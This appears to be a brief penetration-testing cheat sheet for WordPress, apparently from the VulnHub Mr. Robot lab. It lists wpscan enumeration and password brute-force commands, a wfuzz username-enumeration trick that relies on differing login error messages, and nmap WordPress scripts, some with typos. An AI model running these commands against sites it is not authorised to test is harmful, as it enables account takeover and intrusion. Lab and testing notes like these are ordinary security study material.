wpscan --url  <--this will give you basic information about wordpress

wpscan --url --enumerate vp    <---this will give you information on vulnerable plugins

wpscan --url --enumerate at    <---enumerate all things

wpscan -u –wordlist /root/Dropbox/Vulnhub/MrRobot/fsocity.dic –username elliot

wpscan --url -t 20 -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt -U users.txt  <----this will bruteforce passwords :)

The interesting this about the wordpress login was you get a different error depending on which boxes are filled out.

If your user name is wrong the response contains Invalid

If your password is wrong it contains incorrect

Starting with the user name

wfuzz -c -z file,/root/Documents/MrRobot/fsoc.dic — hs Invalid -d “log=FUZZ&pwd=aaaaa”

nmap -sV --script http-wordpress-enum   if ping probes are blocked, use -Pn rather that -sV

nmap -Pn --script http-wordpress-enum --script-args check-latest=true,search-limit=10

nmap -sV --script http-wordpress-enum --script-args limit=25